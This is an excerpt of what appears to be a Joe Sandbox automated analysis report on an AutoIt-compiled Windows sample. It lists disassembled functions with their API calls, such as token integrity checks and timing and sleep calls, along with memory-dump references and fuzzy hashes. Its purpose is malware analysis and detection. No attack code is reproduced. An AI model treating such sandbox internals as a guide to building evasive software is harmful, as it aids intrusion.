Instruction Fuzzy Hash: C721D331204204BAEF255B79BD49E7B7B99DB89710F00812AFC06DA2A1EB69D84097A0

Function 007CB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

GetWindowLongW.USER32(?,000000F0), ref: 007CB44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007CB471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007CB489
GetSystemMetrics.USER32(00000004), ref: 007CB4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007B1184,00000000), ref: 007CB4D0

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: e562998bf4f1f7325088c53e8c8386c73e8b156c0e90f135f05a96d116993ca6
Instruction ID: 4662c2ea851dfa51196f0599d8c08061cf991cdf266387feb5f8c0d042baa8d7
Opcode Fuzzy Hash: e562998bf4f1f7325088c53e8c8386c73e8b156c0e90f135f05a96d116993ca6
Instruction Fuzzy Hash: 12217E31918695AFCB188F38DC05F6A37A5FB05720F14873CF926D61E2E7349A20DB80

Function 007997E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00799802

Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00799834
__itow.LIBCMT ref: 0079984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00799874
__itow.LIBCMT ref: 00799885

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 3218be2ef67fc0a494c72194256a040ca00062bcf74b58e90c8602d32caad1cd
Instruction ID: 98aaccf390788f3a1c4ee45288da864a061c49f2a000a41728cd2f6a18903a17
Opcode Fuzzy Hash: 3218be2ef67fc0a494c72194256a040ca00062bcf74b58e90c8602d32caad1cd
Instruction Fuzzy Hash: 0E21C871B00204EBEF109A699C8AEEE7BA9EF49710F04402DFE05EB291D7788D45D791

Function 007412F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0074134D
SelectObject.GDI32(?,00000000), ref: 0074135C
BeginPath.GDI32(?), ref: 00741373
SelectObject.GDI32(?,00000000), ref: 0074139C

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d1ae86fa8622b14e628ec7878712927396f4997d0e22596fd0643058441f7432
Instruction ID: 7071c7c4011331d5a4675f314893410dc11712e7615ec78855b0a6d09183fec9
Opcode Fuzzy Hash: d1ae86fa8622b14e628ec7878712927396f4997d0e22596fd0643058441f7432
Instruction Fuzzy Hash: 83213C70900208EBDB11AF25DC08B697BF9FB00761F54C22AF814965B0E77999F1DB91

Function 0079C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0079C176
_memcmp.LIBCMT ref: 0079C194
_memcmp.LIBCMT ref: 0079C1A7
_memcmp.LIBCMT ref: 0079C1BF
_memcmp.LIBCMT ref: 0079C1D7

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: a72ca8b9e2307e14118e30d0a9a107919b7d1ae4c76293f3f55756f58233b465
Instruction ID: 39cabc5d71b22d178c5954b235eff008297d426db698fb67b7fd320484f5b6bd
Opcode Fuzzy Hash: a72ca8b9e2307e14118e30d0a9a107919b7d1ae4c76293f3f55756f58233b465
Instruction Fuzzy Hash: E401B9F168410D7BEE05A620AD46F6B775C9B21394F484012FD0597383EA9CDE12C6F9

Function 007A4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007A4D5C
__beginthreadex.LIBCMT ref: 007A4D7A
MessageBoxW.USER32(?,?,?,?), ref: 007A4D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007A4DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007A4DAC

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 2bf4777a78b178b52ce0bb44420acc2d975e1f58d0d00218350d7021f639b33a
Instruction ID: 3cf8f0cba221e72be81b65c82e51999d3a8c790e92c1850b48e0a23fd4fb779a
Opcode Fuzzy Hash: 2bf4777a78b178b52ce0bb44420acc2d975e1f58d0d00218350d7021f639b33a
Instruction Fuzzy Hash: FA1108B2A04248BBC7119BB89C08E9A7FADFBC5320F184369F914D3250D6B98D1087A0

Function 0079874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00798766
GetLastError.KERNEL32(?,0079822A,?,?,?), ref: 00798770
GetProcessHeap.KERNEL32(00000008,?,?,0079822A,?,?,?), ref: 0079877F
HeapAlloc.KERNEL32(00000000,?,0079822A,?,?,?), ref: 00798786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0079879D

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 3fcb905a85b6432beafa1cc37e207525efedf98fb79358a92d8eaf0d9da6826a
Instruction ID: 3edbedf021b855bfa219283c762672f3da99d45766a82df9f2239b7a2b4a04a1
Opcode Fuzzy Hash: 3fcb905a85b6432beafa1cc37e207525efedf98fb79358a92d8eaf0d9da6826a
Instruction Fuzzy Hash: 07014B71200208FFDB204FE6EC88D6B7FADEF8A355B204429F849C6260DA358C00DA60

Function 007A54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A5502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007A5510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A5518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007A5522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A555E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 99ddbcf60b655ea166cf42eb49b2130b840e6d7e807c2b2bff18edd503dfc50c
Instruction ID: faf25cf3cabd8be68927418a64425281c2aebbcec1fe28026f03b533318f4679
Opcode Fuzzy Hash: 99ddbcf60b655ea166cf42eb49b2130b840e6d7e807c2b2bff18edd503dfc50c
Instruction Fuzzy Hash: E4016171D00A1DDBCF00DFE4E8489EDBB7AFB4A711F05425AE901F2140DB385564C7A5

Function 00797652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?,?,0079799D), ref: 0079766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?), ref: 0079768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?), ref: 00797698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?), ref: 007976A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?), ref: 007976B4

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 9abd73a3ff142f7eee76491eec26d37ca250c28ce303d612792ff6d634b5f6f9
Instruction ID: 55ae363a566acbcdcc43f16f01f760b29cde7e24a612be51d4f56d5861d25909
Opcode Fuzzy Hash: 9abd73a3ff142f7eee76491eec26d37ca250c28ce303d612792ff6d634b5f6f9
Instruction Fuzzy Hash: 8E017172615604BBDB145F58EC44EAA7BFDEB44761F144028FD04D2211E739DD41D7A0

Function 007985F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00798608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00798612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00798621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00798628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0079863E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 860a330df1206adf214e462e5e6c6925eb4d8d47667390714a5ee3b051756abb
Instruction ID: f50527ea0440313d997fb5ce4a24270cc7a996cf55b20c8cbdc10f0f9db8ae14
Opcode Fuzzy Hash: 860a330df1206adf214e462e5e6c6925eb4d8d47667390714a5ee3b051756abb
Instruction Fuzzy Hash: 6EF06231201204BFEB101FB5EC8DE6B3FADFF8A754B044429F945C6151CB799C41DA65

Function 00798652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00798669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00798673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00798682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00798689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0079869F

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 424d3d36fd13b25fa618d3e93855367880e5fc2885762cd348a26c34985aa8eb
Instruction ID: 791d1e941ab319e186ace803e77437a015cfef5807582cb1881f6cf78c7dd903
Opcode Fuzzy Hash: 424d3d36fd13b25fa618d3e93855367880e5fc2885762cd348a26c34985aa8eb
Instruction Fuzzy Hash: 88F04971200204AFEB211FA5EC88E6B3FBDFF8AB54B14402AF949CA151CB699D41DA65

Function 0079C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0079C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 0079C6D1
MessageBeep.USER32(00000000), ref: 0079C6E9
KillTimer.USER32(?,0000040A), ref: 0079C705
EndDialog.USER32(?,00000001), ref: 0079C71F

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 8e7c123720b86a778fa976de29f5f20e54a56730ab74af71e0e4308e14175af1
Instruction ID: 18774761bed63b3abf6c59abc0fbd60b8ac6dc58201e4bcacc57818bb0f31c28
Opcode Fuzzy Hash: 8e7c123720b86a778fa976de29f5f20e54a56730ab74af71e0e4308e14175af1
Instruction Fuzzy Hash: 9C016D30500704ABEF229B60ED8EFA677B9FF00705F00466DF582A14E1DBF8A9588F84

Function 007413B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 007413BF
StrokeAndFillPath.GDI32(?,?,0077BAD8,00000000,?), ref: 007413DB
SelectObject.GDI32(?,00000000), ref: 007413EE
DeleteObject.GDI32 ref: 00741401
StrokePath.GDI32(?), ref: 0074141C

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 30f0b98161bf9a51bdb7a0a74247530a72ee4209503bf62ee3d5b0a1d7973eb6
Instruction ID: b44d871afd54a1a415244a2a61fed056fcbf4367e45fe91d74e04dd790d89bb5
Opcode Fuzzy Hash: 30f0b98161bf9a51bdb7a0a74247530a72ee4209503bf62ee3d5b0a1d7973eb6
Instruction Fuzzy Hash: C2F0B230004348ABDB516F6AEC0CB583BA5BB01726F54C239F469850B1E73989F5DF55

Function 00752E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00760FF6: std::exception::exception.LIBCMT ref: 0076102C
Part of subcall function 00760FF6: __CxxThrowException@8.LIBCMT ref: 00761041

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

Part of subcall function 00747BB1: _memmove.LIBCMT ref: 00747C0B

__swprintf.LIBCMT ref: 0075302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00752EC6

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 90d087771d6a565e69a021cc18ee072cc9365ec727f80a6e706d9452dbda5236
Instruction ID: d14108c078fa36c3c3ea444beca488be01e8d0edec67541105eb4b7766233e4a
Opcode Fuzzy Hash: 90d087771d6a565e69a021cc18ee072cc9365ec727f80a6e706d9452dbda5236
Instruction Fuzzy Hash: 49917E71108301EFC718EF24D899CAFB7A5EF85750F04491DF9869B2A1DB68EE48CB52

Function 0079B7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0079B981

Strings

%}, xrefs: 0079BA24
Container, xrefs: 0079B8FE
AutoIt3GUI, xrefs: 0079B8F9

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%}
API String ID: 3565006973-3704997335
Opcode ID: 5ada85c0a1cd3770461fbc2f381bc76164e8ce9917e96193329177b18c1a59c9
Instruction ID: 41ebdd6687025ea6b2a6c5dafb67c96cef2eb79f0785c4ed2e8e566a6d2b494e
Opcode Fuzzy Hash: 5ada85c0a1cd3770461fbc2f381bc76164e8ce9917e96193329177b18c1a59c9
Instruction Fuzzy Hash: 32914970600601DFDB24DF68E984B6ABBE9FF48710F14856EF94ACB291DB74E841CB60

Function 0076524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 007652DD

Part of subcall function 00770340: __87except.LIBCMT ref: 0077037B

Strings

pow, xrefs: 007652B5, 007652D2

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 2c5d2fd7a4407a987118f41a0c0be6ade83cff2f92041bf28c5d00ece650de40
Instruction ID: b8fd2b333654df29e3644abbd35b0a0810e1b92ea57461dcfcf5aeaab880be4b
Opcode Fuzzy Hash: 2c5d2fd7a4407a987118f41a0c0be6ade83cff2f92041bf28c5d00ece650de40
Instruction Fuzzy Hash: 4B517B61A1D601CBCF157724C95137E2B94AB017D4F20C959E8CE862E6EF7C8CD4EACA

Function 0076023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00760280
+, xrefs: 00760277

Memory Dump Source

